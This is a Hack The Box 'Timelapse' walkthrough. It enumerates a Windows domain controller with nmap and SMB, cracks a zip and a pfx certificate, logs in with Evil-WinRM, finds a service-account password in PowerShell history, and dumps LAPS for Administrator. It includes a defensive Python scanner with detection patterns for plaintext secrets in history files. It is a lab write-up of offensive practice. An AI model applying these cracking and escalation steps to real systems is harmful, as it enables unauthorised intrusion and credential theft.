Hack The Box Timelapse Walkthrough
Timelapse
Initial recon
Ping
The machine is running Windows. By default, Windows blocks ICMP echo requests, so pinging a machine isn't possible. On this box, the author seems to have enabled ICMP:
$ ping -c2 10.10.11.152
PING 10.10.11.152 (10.10.11.152) 56(84) octets de données.
64 octets de 10.10.11.152 : icmp_seq=1 ttl=127 temps=83.8 ms
64 octets de 10.10.11.152 : icmp_seq=2 ttl=127 temps=83.5 ms
--- statistiques ping 10.10.11.152 ---
2 paquets transmis, 2 reçus, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 83.485/83.620/83.755/0.135 ms
Port scanning
Here is the result of the nmap port scan:
$ sudo nmap -sSVC -p- -T5 10.10.11.152 -oA timelapse_full
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-31 10:39 CEST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.11.152
Host is up (0.18s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-31 16:47:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2022-05-31T16:48:49+00:00; +7h59m53s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
54524/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-05-31T16:48:08
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h59m52s, deviation: 0s, median: 7h59m52s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 579.88 seconds
The certificate gave us the domain name and the name of the server:
- timelapse.htb -> Domain
- dc01.timelapse.htb -> Server name
With this information we learn that the machine is a domain controller, and we can be more specific about the OS: it is Microsoft Windows Server.
SMB
Getting the archive
Share listing:
$ smbclient -L 10.10.11.152
Password for [MYGROUP\libereau]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
In the Dev folder of the Shares share, a .zip file is present, but it is password protected.
$ smbclient //10.10.11.152/SHARES
Password for [MYGROUP\libereau]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 17:39:15 2021
.. D 0 Mon Oct 25 17:39:15 2021
Dev D 0 Mon Oct 25 21:40:06 2021
HelpDesk D 0 Mon Oct 25 17:48:42 2021
6367231 blocks of size 4096. 1319349 blocks available
smb: \> cd Dev
smb: \Dev\> ls
. D 0 Mon Oct 25 21:40:06 2021
.. D 0 Mon Oct 25 21:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 17:46:42 2021
6367231 blocks of size 4096. 1318297 blocks available
Cracking the archive
The zip file is password protected.
I've tried many things, like zip2john and trying to break the hash, but it didn't work. So I found an online tool, which gave me the password for the zip file:
The password is “supremelegacy”.
The archive contains legacyy_dev_auth.pfx.
First access to the machine
A .pfx file, in PKCS#12 format, contains an SSL certificate and the corresponding private key. This pair can be used to authenticate to a machine over WinRM with Evil-WinRM.
After some googling (again!) I found a tool to brute-force pfx files, called crackpkcs12. The tool takes as input the pfx file (obviously) and a dictionary. I ran it with rockyou, and after some time:
$ crackpkcs12 -d rockyou.txt legacyy_dev_auth.pfx
Dictionary attack - Starting 1 threads
*********************************************************
Dictionary attack - Thread 1 - Password found: thuglegacy
*********************************************************
The password is then thuglegacy.
We can then extract the certificate and the private key with openssl (it prompts for the import password found above):
# certificate only (-clcerts -nokeys): without these two switches openssl writes the key into cert.pem as well
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.pem
# private key only (-nocerts), written unencrypted (-nodes) so Evil-WinRM can read it
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out win.key
The connection is then easy, as long as you don't forget the "-S" parameter to force SSL:
Privilege Escalation
After getting the first access, the first thing to do is to upload winpeas.bat (or .exe) and run it. With evil-winrm you can just use the "upload" command to put winpeas.bat on the server. I ran it and saw something interesting:
Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
03/04/2022 12:46 AM 434 ConsoleHost_history.txt
1 File(s) 434 bytes
0 Dir(s) 9,038,331,904 bytes free
The content of the file is the following:
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
We can see a user, svc_deploy, and a password, E3R$Q62^12p7PLlC%KWaxuaV, which might be the svc_deploy password.
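The history file leaked a service-account password because the SecureString was built from a string literal and the command line was saved to disk. As an added example (not from the original post), here is a small Python scanner a defender could run over PSReadLine ConsoleHost_history.txt files to flag that pattern and tie the secret to the account it wraps; the sample history and its password are constructed placeholders, not the box's real values.

```python
import re

# Constructed sample of a PSReadLine ConsoleHost_history.txt, modelled on the
# one found on the box (placeholder password, not the real one).
SAMPLE_HISTORY = """whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Placeholder-P@ss1' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
"""

# A SecureString built from a quoted literal with -AsPlainText: the secret is on
# disk in clear. (Read-Host -AsSecureString does not match, which is correct.)
SECURESTRING_RE = re.compile(
    r"\$(?P<var>\w+)\s*=\s*ConvertTo-SecureString\s+(['\"])(?P<secret>.+?)\2[^\n]*-AsPlainText",
    re.IGNORECASE)
# A PSCredential wrapping that variable tells us which account the secret is for.
PSCRED_RE = re.compile(
    r"PSCredential\s*\(\s*(['\"])(?P<user>[^'\"]+)\1\s*,\s*\$(?P<var>\w+)\s*\)",
    re.IGNORECASE)
# Other common ways a secret ends up inline on a command line.
INLINE_SECRET_RE = re.compile(r"(?:-Password\b|-Pass\b|/p:|password=)\s*\S+", re.IGNORECASE)


def scan_history(text):
    """Return findings as (line_no, kind, user, secret) tuples for credential
    material written in clear text to a PowerShell history file."""
    findings = []
    secret_vars = {}  # variable name -> secret literal assigned to it
    for no, line in enumerate(text.splitlines(), 1):
        m = SECURESTRING_RE.search(line)
        if m:
            secret_vars[m.group("var")] = m.group("secret")
            findings.append((no, "plaintext-securestring", None, m.group("secret")))
            continue
        m = PSCRED_RE.search(line)
        if m and m.group("var") in secret_vars:
            findings.append((no, "credential-pair", m.group("user"), secret_vars[m.group("var")]))
            continue
        if INLINE_SECRET_RE.search(line):
            findings.append((no, "inline-secret", None, line.strip()))
    return findings


if __name__ == "__main__":
    for no, kind, user, secret in scan_history(SAMPLE_HISTORY):
        print(f"line {no}: {kind} user={user} secret={secret!r}")
```

Pointing it at every user's PSReadLine directory on a host is a cheap way to catch exactly the kind of leak that turned a low-privilege shell into svc_deploy here.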
Earlier, while looking at the SMB Shares folder, we saw some documentation about LAPS.
LAPS (Local Administrator Password Solution) manages the local administrator account passwords of domain-joined computers. The passwords are stored in Active Directory and protected by an ACL, so only principals granted read access on that attribute can retrieve them.
Many tools are available on GitHub for dumping LAPS passwords. I used this one. You just have to specify the user, password and domain name:
This password is the Administrator password. We can then use it with evil-winrm to log in as Administrator.
Bim Bam Boom, rooted!
Thank you for reading, Libereau